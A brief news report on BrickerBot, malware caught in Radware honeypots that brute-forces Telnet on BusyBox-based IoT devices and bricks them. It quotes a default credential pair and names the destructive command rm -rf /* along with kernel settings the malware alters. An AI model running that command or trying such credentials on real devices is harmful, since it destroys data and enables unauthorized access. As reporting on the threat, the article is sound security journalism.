A new form of attack code has come to town and it uses techniques similar to Mirai to permanently scramble Internet of Things devices.
On March 20 researchers at security shop Radware spotted the malware, dubbed Brickerbot, cropping up in honeypots it sets up across the web to lure interesting samples. In the space of four days, one honeypot logged 1,895 infection attempts by Brickbot, with the majority of attacks coming from Argentina, and a second logged 333 attempts – untraceable as they came from a Tor node.
“The Bricker Bot attack used Telnet brute force – the same exploit vector used by Mirai – to breach a victim’s devices,” Radware’s advisory states.
“Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/’vizxv.'”
The malware targets Linux-based IoT devices running the BusyBox toolkit, and seems to have a particular affinity for Ubiquiti network devices, which have their own security issues. Once inside the operating system, the code starts to scramble the onboard memory using rm -rf /* and disabling TCP timestamps, as well as limiting the max number of kernel threads to one.
For Full Story, Please click here.